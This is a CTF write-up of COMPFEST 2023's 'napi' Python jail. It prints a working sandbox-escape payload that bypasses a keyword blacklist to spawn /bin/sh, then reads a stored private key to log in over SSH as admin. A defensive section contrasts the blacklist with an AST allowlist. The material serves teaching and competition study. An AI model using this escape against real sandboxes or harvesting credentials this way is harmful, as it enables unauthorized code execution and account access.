
COMPFEST CTF 2023 - napi

Description

Category: Misc

john is currently planning an escape from jail. Fortunately, he got a snippet of the jail source code from his cellmate. Can you help john to escape?

nc 34.101.68.243 10008

Author: k3ng

Attachments:

Resolution

1. Overview

The challenge is a classic Python eval jail with no restriction on input length, but with some banned keywords.

banned = ['eval', 'exec', 'import', 'open', 'system', 'globals', 'os', 'password', 'admin', 'pop', 'clear', 'remove']

__builtins__.__import__ has been deleted, so we cannot use it to import a module.

2. Escape the jail

Let’s print all the subclasses we can reach from ():

john > print(().__class__.__base__.__subclasses__())
[<class 'type'>, <class 'weakref'>, ..., <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class '_sitebuiltins._Helper'>]

There is <class 'os._wrap_close'> which allows us to access os.system and execute commands.

# Retrieve os._wrap_close
[x for x in ().__class__.__base__.__subclasses__() if 'wrap_clo'+'se' in str(x)][0]

# Run /bin/sh
[x for x in ().__class__.__base__.__subclasses__() if 'wrap_clo'+'se' in str(x)][0].__init__.__getattribute__('__glob'+'als__')['sys'+'tem']('/bin/sh')

By the way, this is how I bypassed the banned keywords:

  • the word is a string: split it ('system' -> 'sys'+'tem')
  • the word is a method: use __getattribute__ (x.system -> x.__getattribute__('sys'+'tem'))
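
Why a keyword blacklist cannot stop this, shown next to a parse-then-allowlist check (added example, not the challenge's code). The substring filter is an assumed reconstruction, since only the banned list is shown here, and the function names and the arithmetic-only policy are hypothetical.

```python
import ast

# Banned list copied from the write-up. The substring test is an ASSUMED
# reconstruction of the jail's filter; the challenge source is not shown.
BANNED = ['eval', 'exec', 'import', 'open', 'system', 'globals', 'os',
          'password', 'admin', 'pop', 'clear', 'remove']

def blacklist_allows(src):
    """Assumed jail check: accept unless a banned word appears verbatim."""
    return not any(word in src for word in BANNED)

# Hypothetical hardened policy: arithmetic on numbers only. Attribute access,
# calls, subscripts, comprehensions and names are simply not in the grammar.
ALLOWED_NODES = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
                 ast.Add, ast.Sub, ast.Mult, ast.Div, ast.Mod,
                 ast.UAdd, ast.USub)

def allowlist_allows(src):
    """Parse the input and accept it only if every AST node is allowed."""
    try:
        tree = ast.parse(src, mode='eval')
    except SyntaxError:
        return False
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED_NODES):
            return False
        # Numeric literals only; bool is excluded explicitly (it subclasses int)
        if isinstance(node, ast.Constant) and (
                isinstance(node.value, bool)
                or not isinstance(node.value, (int, float))):
            return False
    return True

def rejected_nodes(src):
    """Names of the node types that make the allowlist refuse an input."""
    tree = ast.parse(src, mode='eval')
    return sorted({type(n).__name__ for n in ast.walk(tree)
                   if not isinstance(n, ALLOWED_NODES)})

# The payload from this write-up, used only as filter input, never evaluated.
PAYLOAD = ("[x for x in ().__class__.__base__.__subclasses__() "
           "if 'wrap_clo'+'se' in str(x)][0].__init__"
           ".__getattribute__('__glob'+'als__')['sys'+'tem']('/bin/sh')")

if __name__ == "__main__":
    for sample in ("2 + 3 * 4", "os.system('id')", PAYLOAD):  # constructed
        print(blacklist_allows(sample), allowlist_allows(sample), sample[:40])
    print(rejected_nodes(PAYLOAD))
```

The blacklist inspects the text of the input, while the allowlist inspects what the parser will actually execute, so string concatenation and __getattribute__ make no difference to it.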

Now that we have access to a shell, let’s gather some info:

ls -la
total 44
drwx------ 1 ctf  ctf  4096 Sep  9 23:20 .
drwxr-xr-x 1 root root 4096 Sep  9 01:59 ..
-rw-r--r-- 1 ctf  ctf   220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 ctf  ctf  3771 Apr  4  2018 .bashrc
-rw-r--r-- 1 ctf  ctf   807 Apr  4  2018 .profile
-rw-r--r-- 1 ctf  ctf  1378 Sep  9 23:16 chall.py
-rw-r--r-- 1 root root 2270 Sep  9 23:20 creds.txt
-rw-r--r-- 1 ctf  ctf   336 Sep  9 01:54 notice.txt
-rwxr-xr-x 1 ctf  ctf    87 Sep  9 01:54 start.sh
cat notice.txt
--- IMPORTANT NOTICE ---

Dear admins, I have received information that a prisoner is trying to get access to the flag.
I have moved the flag somewhere safe.
I would advise you not to access the flag right now. 
But if there is an urgent matter, login to admin@THIS_SERVER_IP:10009 with your password as the SSH key to access the flag.

According to the notice, we can get the flag by connecting over SSH to admin@THIS_SERVER_IP:10009.

The SSH key is stored in creds.txt and is base64 encoded.

cat creds.txt

Once decoded, the file is an RSA private key in PEM format.


Now we can connect to the server and get the flag:

$ ssh admin@34.101.68.243 -p 10009 -i key 
Welcome to PRISON ADMINISTRATOR SHELL
Last login: Mon Sep 11 13:21:55 2023 from 87.247.121.172
$ ls -la
total 36
drwxr-xr-x 1 admin admin 4096 Sep 10 23:56 .
drwxr-xr-x 1 root  root  4096 Sep  9 01:59 ..
-rw-r--r-- 1 admin admin  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 admin admin 3771 Apr  4  2018 .bashrc
drwx------ 2 admin admin 4096 Sep 10 23:56 .cache
-rw-r--r-- 1 admin admin  807 Apr  4  2018 .profile
drwx------ 2 admin admin 4096 Sep  9 23:20 .ssh
-rw-r--r-- 1 root  root    38 Sep  9 23:16 flag.txt
$ cat flag.txt
COMPFEST15{j0hN_1s_a_mF_G_49e65c3afb}

COMPFEST15{j0hN_1s_a_mF_G_49e65c3afb}

This post is licensed under CC BY 4.0 by the author.